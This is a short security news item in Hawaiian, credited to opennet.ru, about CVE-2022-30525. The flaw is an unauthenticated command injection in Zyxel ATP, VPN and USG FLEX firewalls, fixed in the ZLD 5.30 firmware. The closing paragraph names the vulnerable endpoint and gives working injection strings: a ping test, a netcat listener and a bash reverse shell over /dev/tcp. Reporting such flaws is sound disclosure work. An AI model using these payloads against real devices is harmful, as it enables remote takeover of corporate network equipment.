Ua ʻike ʻia kahi nāwaliwali koʻikoʻi (CVE-2022-30525) i nā polokalamu Zyxel o ka ATP, VPN a me USG FLEX series, i hoʻolālā ʻia e hoʻonohonoho i ka hana o nā pā ahi, IDS a me VPN i nā ʻoihana, e hiki ai i kahi mea hoʻouka kaua waho ke hoʻokō i ke code ma ka mea me ka pono ole o ka mea hoohana me ka hooiaio ole. No ka hoʻokō ʻana i kahi hoʻouka kaua, pono e hiki i ka mea hoʻouka ke hoʻouna i nā noi i ka hāmeʻa me ka hoʻohana ʻana i ka protocol HTTP/HTTPS. Ua hoʻopaʻa ʻo Zyxel i ka nāwaliwali i ka ZLD 5.30 firmware update. Wahi a ka lawelawe ʻo Shodan, aia i kēia manawa he 16213 mau mea pilikia ma ka pūnaewele puni honua e ʻae i nā noi ma o HTTP/HTTPS.
Hana ʻia ka hana ma ka hoʻouna ʻana i nā kauoha i hoʻolālā ʻia i ka mea hoʻohana pūnaewele /ztp/cgi-bin/handler, hiki ke loaʻa me ka ʻole o ka hōʻoia. Loaʻa ka pilikia ma muli o ka hoʻomaʻemaʻe pono ʻole o nā ʻāpana noi i ka wā e hoʻokō ai i nā kauoha ma ka ʻōnaehana me ka hoʻohana ʻana i ke kelepona os.system i hoʻohana ʻia ma ka waihona lib_wan_settings.py a hoʻokō ʻia i ka wā e hoʻoponopono ai i ka hana setWanPortSt.
No ka laʻana, hiki i ka mea hoʻouka ke hele i ke kaula "; ping 192.168.1.210; e alakaʻi i ka hoʻokō ʻana i ke kauoha "ping 192.168.1.210" ma ka ʻōnaehana. No ke komo ʻana i ka shell command, hiki iā ʻoe ke holo i ka "nc -lvnp 1270" ma kāu ʻōnaehana, a laila e hoʻomaka i kahi pilina hope ma ka hoʻouna ʻana i kahi noi i ka hāmeʻa me ka '; bash -c \»exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\»;'.
Source: opennet.ru